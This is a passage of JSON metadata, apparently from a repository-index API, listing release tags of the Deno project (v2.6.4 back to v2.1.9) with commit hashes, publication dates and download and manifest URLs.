manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"